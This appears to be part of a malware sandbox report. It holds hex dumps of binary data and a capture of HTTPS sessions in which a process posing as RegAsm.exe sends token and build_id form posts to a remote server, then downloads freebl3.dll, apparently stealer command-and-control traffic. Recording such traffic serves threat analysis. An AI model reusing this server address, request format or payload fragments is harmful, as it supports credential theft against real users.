                                                                                                                                                                                                                                                  2024-03-29 11:07:58 UTC16384INData Raw: cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                                                  Data Ascii: X~e!*FW|>|L1146
                                                                                                                                                                                                                                                  2024-03-29 11:07:58 UTC16384INData Raw: 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 8b f8 e8 51 39 10 00 83 c4 20 80 7e 57 00 5b
                                                                                                                                                                                                                                                  Data Ascii: tP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSVQ9 ~W[
                                                                                                                                                                                                                                                  2024-03-29 11:07:58 UTC16384INData Raw: be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 74 24 28 89 4c 24 58 e9 f4 00 00 00 8b 46 08
                                                                                                                                                                                                                                                  Data Ascii: 0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB|$-tDt$pV9"WfD$hL$lt$hT$5t$(L$XF
                                                                                                                                                                                                                                                  2024-03-29 11:07:59 UTC16384INData Raw: 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f 0a 8b 44 24 14 39 44 24 38 76 12 8b 07 51 ff
                                                                                                                                                                                                                                                  Data Ascii: $;sD$D$ T$$"$D$k;l$$|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP|$4L$ l$8j|$L$8QW@L$,9L$<|D$9D$8vQ
                                                                                                                                                                                                                                                  2024-03-29 11:07:59 UTC16384INData Raw: 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                                                  Data Ascii: 3@f@D$VF@:'|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
                                                                                                                                                                                                                                                  2024-03-29 11:07:59 UTC16384INData Raw: ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                                                  Data Ascii: T$L$$l$ GT$GL$L$T$_^][_^]3[
                                                                                                                                                                                                                                                  2024-03-29 11:07:59 UTC16384INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68
                                                                                                                                                                                                                                                  Data Ascii: Vt$W|$FVBhtw7t7Vg_^jjjh,g!t$jjjh
                                                                                                                                                                                                                                                  2024-03-29 11:07:59 UTC16384INData Raw: 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 e2 8b 4c 24 10 4a d3 e2 09 96 c4 00 00 00 5f
                                                                                                                                                                                                                                                  Data Ascii: qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^|$u|$u_^3ARt$t$PA8tuL$L$J_
                                                                                                                                                                                                                                                  2024-03-29 11:07:59 UTC16384INData Raw: cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 56 ff 15 3c 20 24 10 a1 38 82 24 10 83
                                                                                                                                                                                                                                                  Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW|$mw<(6XvutT9 $tB8$tPh $VD $)$$V< $8$


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  7192.168.2.44974978.46.229.364437564C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-03-29 11:08:00 UTC311OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----CFCBFHJECAKEHIECGIEB
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 78.46.229.36
                                                                                                                                                                                                                                                  Content-Length: 4677
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  2024-03-29 11:08:00 UTC4677OUTData Raw: 2d 2d 2d 2d 2d 2d 43 46 43 42 46 48 4a 45 43 41 4b 45 48 49 45 43 47 49 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 35 35 36 35 65 31 35 33 31 36 35 34 35 38 37 38 33 39 37 39 66 38 39 31 35 63 65 38 31 65 30 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 46 48 4a 45 43 41 4b 45 48 49 45 43 47 49 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 30 30 32 37 65 33 35 66 36 63 62 35 34 38 34 38 30 61 36 66 62 38 62 64 37 63 64 65 30 63 66 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 46 48 4a 45 43 41 4b 45 48 49 45 43 47 49 45 42 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                  Data Ascii: ------CFCBFHJECAKEHIECGIEBContent-Disposition: form-data; name="token"a5565e153165458783979f8915ce81e0------CFCBFHJECAKEHIECGIEBContent-Disposition: form-data; name="build_id"90027e35f6cb548480a6fb8bd7cde0cf------CFCBFHJECAKEHIECGIEBCont
                                                                                                                                                                                                                                                  2024-03-29 11:08:01 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Fri, 29 Mar 2024 11:08:01 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  2024-03-29 11:08:01 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  8192.168.2.44975078.46.229.364437564C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-03-29 11:08:01 UTC311OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----KJDGDBFBGIDGIEBGHCGI
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 78.46.229.36
                                                                                                                                                                                                                                                  Content-Length: 1529
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  2024-03-29 11:08:01 UTC1529OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 42 46 42 47 49 44 47 49 45 42 47 48 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 35 35 36 35 65 31 35 33 31 36 35 34 35 38 37 38 33 39 37 39 66 38 39 31 35 63 65 38 31 65 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 42 46 42 47 49 44 47 49 45 42 47 48 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 30 30 32 37 65 33 35 66 36 63 62 35 34 38 34 38 30 61 36 66 62 38 62 64 37 63 64 65 30 63 66 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 42 46 42 47 49 44 47 49 45 42 47 48 43 47 49 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                  Data Ascii: ------KJDGDBFBGIDGIEBGHCGIContent-Disposition: form-data; name="token"a5565e153165458783979f8915ce81e0------KJDGDBFBGIDGIEBGHCGIContent-Disposition: form-data; name="build_id"90027e35f6cb548480a6fb8bd7cde0cf------KJDGDBFBGIDGIEBGHCGICont
                                                                                                                                                                                                                                                  2024-03-29 11:08:02 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Fri, 29 Mar 2024 11:08:02 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  2024-03-29 11:08:02 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  9192.168.2.44975178.46.229.364437564C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-03-29 11:08:02 UTC310OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----GHDHDBAECGCAFHJJDAKF
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 78.46.229.36
                                                                                                                                                                                                                                                  Content-Length: 437
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  2024-03-29 11:08:02 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 47 48 44 48 44 42 41 45 43 47 43 41 46 48 4a 4a 44 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 35 35 36 35 65 31 35 33 31 36 35 34 35 38 37 38 33 39 37 39 66 38 39 31 35 63 65 38 31 65 30 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 48 44 42 41 45 43 47 43 41 46 48 4a 4a 44 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 30 30 32 37 65 33 35 66 36 63 62 35 34 38 34 38 30 61 36 66 62 38 62 64 37 63 64 65 30 63 66 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 48 44 42 41 45 43 47 43 41 46 48 4a 4a 44 41 4b 46 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                  Data Ascii: ------GHDHDBAECGCAFHJJDAKFContent-Disposition: form-data; name="token"a5565e153165458783979f8915ce81e0------GHDHDBAECGCAFHJJDAKFContent-Disposition: form-data; name="build_id"90027e35f6cb548480a6fb8bd7cde0cf------GHDHDBAECGCAFHJJDAKFCont
                                                                                                                                                                                                                                                  2024-03-29 11:08:03 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Fri, 29 Mar 2024 11:08:03 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  2024-03-29 11:08:03 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  10192.168.2.44975278.46.229.364437564C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-03-29 11:08:03 UTC310OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----CAAKKFHCFIECAAAKEGCF
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 78.46.229.36
                                                                                                                                                                                                                                                  Content-Length: 437
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  2024-03-29 11:08:03 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 43 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 35 35 36 35 65 31 35 33 31 36 35 34 35 38 37 38 33 39 37 39 66 38 39 31 35 63 65 38 31 65 30 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 30 30 32 37 65 33 35 66 36 63 62 35 34 38 34 38 30 61 36 66 62 38 62 64 37 63 64 65 30 63 66 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                  Data Ascii: ------CAAKKFHCFIECAAAKEGCFContent-Disposition: form-data; name="token"a5565e153165458783979f8915ce81e0------CAAKKFHCFIECAAAKEGCFContent-Disposition: form-data; name="build_id"90027e35f6cb548480a6fb8bd7cde0cf------CAAKKFHCFIECAAAKEGCFCont
                                                                                                                                                                                                                                                  2024-03-29 11:08:04 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Fri, 29 Mar 2024 11:08:04 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  2024-03-29 11:08:04 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  11192.168.2.44975378.46.229.364437564C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-03-29 11:08:04 UTC205OUTGET /freebl3.dll HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 78.46.229.36
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  2024-03-29 11:08:05 UTC246INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Fri, 29 Mar 2024 11:08:05 GMT
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  Content-Length: 685392
                                                                                                                                                                                                                                                  Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  ETag: "6315a9f4-a7550"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  2024-03-29 11:08:05 UTC16138INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00
                                                                                                                                                                                                                                                  Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
                                                                                                                                                                                                                                                  2024-03-29 11:08:05 UTC16384INData Raw: 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f a4 c3 01 89 5d 9c 8b 45 b8 03 85 30 ff ff ff 8b
                                                                                                                                                                                                                                                  Data Ascii: }1M1XM}}UU1M1UM] EH]EE|1E1EMMuuU1M1Mu]uM11U|uuMM1]1x]E0
